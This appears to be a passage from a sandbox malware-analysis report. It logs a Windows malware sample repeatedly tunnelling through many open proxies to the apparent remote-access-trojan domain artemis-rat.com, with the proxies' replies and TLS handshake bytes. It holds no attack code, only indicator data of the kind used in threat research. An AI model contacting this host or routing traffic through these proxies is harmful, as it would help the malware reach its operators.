                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.718105078 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1495192.168.2.454726104.16.105.142807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.185908079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.344429016 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1496192.168.2.45487747.236.85.1134437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.186294079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1497192.168.2.454400117.160.250.163817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.186345100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.732677937 CET221INHTTP/1.1 403 Access Denied
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Connection: close
                                              Cache-Control: no-store
                                              Content-Type: text/html
                                              Content-Language: en
                                              Content-Length: 43
                                              Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                              Data Ascii: You are not allowed to access the document.


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1498192.168.2.45458123.94.123.24388887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.186667919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.203934908 CET84INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:30 GMT
                                              Transfer-Encoding: chunked


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1499192.168.2.45455043.129.228.4678917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.186747074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.846365929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1500192.168.2.45449439.108.229.1480027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.186858892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.533230066 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1501192.168.2.454499103.63.190.7280807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.188819885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1502192.168.2.454568211.222.252.18781937284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.190129995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1503192.168.2.454705103.35.189.21731287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.213783979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.972292900 CET39INHTTP/1.0 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1504192.168.2.45284218.133.16.21807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.216192007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.509370089 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0
                                              Mar 11, 2024 08:37:24.527003050 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ee b4 b3 f5 de bd 67 d1 78 70 76 a4 07 43 f5 c5 d4 86 92 fa 4d 36 ed 63 2c 4c 09 8e 25 af 9f 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                              Data Ascii: lhegxpvCM6c,L%*,+0/$#('=<5/artemis-rat.com#5+lxLpx %W7xIW|.BI)ZI#4f"c:%)v
                                              Mar 11, 2024 08:37:24.822989941 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 1c c0 24 66 ad 2d c9 6d 71 67 07 19 7f fb bd f2 e2 e8 37 24 40 7c e1 4e 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                              Data Ascii: =9$f-mqg7$@|NDOWNGRD0000*H010Uartemis-rat.com0240311072552Z260311072552Z010Uartemis-rat.com0"0*H0>ff&'.
                                              Mar 11, 2024 08:37:25.069020987 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 5f fd 86 41 e7 3a 05 6f 10 23 d2 ef 92 96 b9 1b e4 0b e8 43 43 60 de 98 69 d4 90 aa a4 1e aa 04 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 f0 a6 29 4f 0a 61 cd 34 df 10 f1 ae 14 ba 00 66 33 7b b7 57 c5
                                              Data Ascii: %! _A:o#CC`i()Oa4f3{W/:3
                                              Mar 11, 2024 08:37:25.360255003 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 70 2d 21 ea 9a 03 d5 c4 3b 47 65 5f b2 09 96 06 9a 31 73 0c 13 37 b8 e3 70 71 d9 ed 17 98 36 93 e6 3a 35 b6 59 a7 83 3d
                                              Data Ascii: (p-!;Ge_1s7pq6:5Y=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1505192.168.2.454807172.67.181.126807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.216274023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.371052027 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1506192.168.2.44990862.171.131.101374477284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.216377974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.246767998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.366699934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.366606951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:48.408202887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:00.413084030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:12.538187981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1507192.168.2.452630148.72.23.56600697284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.216434956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1508192.168.2.454584157.25.92.7431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.216458082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.546778917 CET1254INHTTP/1.1 403 Forbidden
                                              Server: squid/3.5.28
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 952
                                              X-Squid-Error: ERR_ACCESS_DENIED 0
                                              Content-Language: en
                                              X-Cache: MISS from ah_test
                                              Via: 1.1 ah_test (squid/3.5.28)
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d 6f 6e 2c 20 31 31 20 4d 61 72 20 32 30 32 34 20 30 37 3a 33 37 3a 32 34 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Mon, 11 Mar 2024 07:37:24 GMT</p></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1509192.168.2.45472438.162.28.3331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.219691992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.646281958 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1510192.168.2.449882135.125.225.7580807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.220835924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.246766090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1511192.168.2.45283338.162.3.17531287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.223490000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.645934105 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1512192.168.2.45463751.75.126.150154747284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.223565102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.069377899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1513192.168.2.45489849.51.94.124437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.223910093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
